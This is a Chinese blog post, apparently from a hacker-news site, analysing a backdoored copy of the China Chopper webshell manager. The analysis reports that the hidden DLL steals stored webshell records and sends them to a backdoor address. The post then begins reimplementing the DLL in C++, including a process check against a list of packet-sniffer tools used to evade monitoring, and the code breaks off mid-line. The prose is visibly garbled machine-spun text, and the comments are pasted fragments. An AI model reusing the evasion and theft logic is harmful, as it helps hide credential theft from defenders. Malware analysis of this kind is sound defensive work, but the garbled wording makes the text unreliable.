中国菜刀-它到底做错了什么?

中国菜刀-它到底做错了什么?

入侵渗透hacker2019-06-06 11:50:0814124A+A-

中国菜刀-它究竟做不对哪些?

前因后果

很长过段时间一直忙里偷闲,但做为人们都要做些哪些,否则会发疯,因此我挑选了一天到晚在群里瞎胡扯,瞎胡扯都是门大学问,扯的好或是不太好,都不可以把这一淡长期的扯下去,因此我刚开始找寻哪个说白了的均衡-咸中带淡、淡中带咸,只有这并不是重中之重,这儿也不表了。在近期的瞎胡扯中有堂哥说搜集上了这款中国菜刀,这个中国菜刀不同寻常,别人动了手和脚,因此总有了下文。

爱之初体验

获得样版后,立即压解,发觉很清新就5个文档和文件夹名称,也对伐,中国菜刀原本也没好多个文档和文件夹名称,如下图所示:

看过一下下标志应当是13款的中国菜刀,可是db.tmp是什么玩意?WTF!先给db.tmp重命名为db.tmp.bak,再开启caidao.exe发觉立即系统错误了,如下图所示:

见到上边的出错,立即能够确实db.tmp是1个dll文档,确实许多人会提出质疑为何并不是临时文件呢?立即用C32asm开启看一下文档头吧,如下图所示:

家里的临时文件张那样么?又有杠精会提出质疑为何并不是exe呢?把db.tmp.bak改成db.tmp,一切正常开启中国菜刀,应用火绒内嵌的火绒剑查询caidao.exe系统进程应用的控制模块,发觉目录中存有db.tmp,如下图所示:

这儿重中之重安利一下火绒的火绒剑,剖析就用火绒剑,网络黑客用了都答应,美乐家完毕,说回正题。

都了解db.tmp是dll了,也别藏着掖着了,立即更名叫db.dll患上,清楚一目了然。应用C32asm开启db.dll文档,看一下大葫芦里都卖的什药。

慢慢的走慢慢看,渐渐向下翻,翻过山和海洋在一望无际空格符中见到了,措不及防的粗俗,要我痛心到喘不过气来,如下图所示:

强忍痛心再次向下看,越过熙熙攘攘在一望无际空格符中又见到了,别在拆磨我了,俗语说:因此情深留不住,只能套路得人心。来个套路吧!别再深情告白了,各位看官都跑了,如下图所示:

谁TM还没有点小性子,再TM出現我TM不看了,即使做咸鱼,我TM还要做最咸的那这条!

再次向下看,发觉存有对系统进程的实际操作,及其N多流量统计专用工具的系统进程名,如下图所示:

再次向下看,发觉对数据库查询开展联接,并获得了表的所有统计数据,如下图所示:

这一表里边储存的是什么?开启中国菜刀并加上统计数据,如下图所示:

应用专用工具查询db.mdb数据库查询表的內容,发觉储存的是shell纪录,如下图所示:

再向下看,发觉侧门详细地址,如下图所示:

相关爱之初体验阶段能够小结为,根据对caidao.exe文档开展改动,使caidao.exe载入db.tmp文档,对db.tmp文档剖析获知该文档是dll,该dll建立的作用能够小结给出:

分辨系统进程名中是不是存有流量统计专用工具

连接数据库并获得shell信息内容

应用.compost请求传送shell信息内容

爱之再试探

对爱之初体验阶段小结的作用应用编码开展复现。

分辨某一系统进程名是不是存有

#include"tlhelp32.h"

DWORD GetProcessIdFromName(LPCWSTR name)

{

    PROCESSENTRY32 pE;

    DWORD Id = 0;

    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    pE.dwSize = sizeof(PROCESSENTRY32);

    if (!Process32First(hSnapshot, &pE))

       return 0;

    while (1)

    {

       pE.dwSize = sizeof(PROCESSENTRY32);

       if (Process32Next(hSnapshot, &pE) == FALSE)

         break;

       if (wcscmp(pE.szExeFile, name) == 0)

       {

         Id = pE.th32ProcessID;

         break;

       }

    }

    CloseHandle(hSnapshot);

    return Id;

}

if(GetProcessIdFromName(_T("calc.exe")) || GetProcessIdFromName(_T("WSockExpert_fr.exe")) || GetProcessIdFromName(_T("WSockExpert.exe")) || GetProcessIdFromName(_T("CHKenCap.exe")) || GetProcessIdFromName(_T("SmartSniff.exe")) || GetProcessIdFromNa


点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 4条评论
  • 冬马芩酌2022-05-28 04:10:29
  • nbsp;    {         Id = pE.th32ProcessID;         break;
  • 礼忱苍阶2022-05-28 06:37:50
  • nbsp;   if (!Process32First(hSnapshot, &pE))       return 0;    while (1)&n
  • 泪灼矫纵2022-05-28 06:59:56
  • mp(pE.szExeFile, name) == 0)       {         I
  • 弦久觅遇2022-05-28 04:31:01
  • 展改动,使caidao.exe载入db.tmp文档,对db.tmp文档剖析获知该文档是dll,该dll建立的作用能够小结给出:分辨系统进程名中是不是存有流量统计专用工具连接数据库并获得shel

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理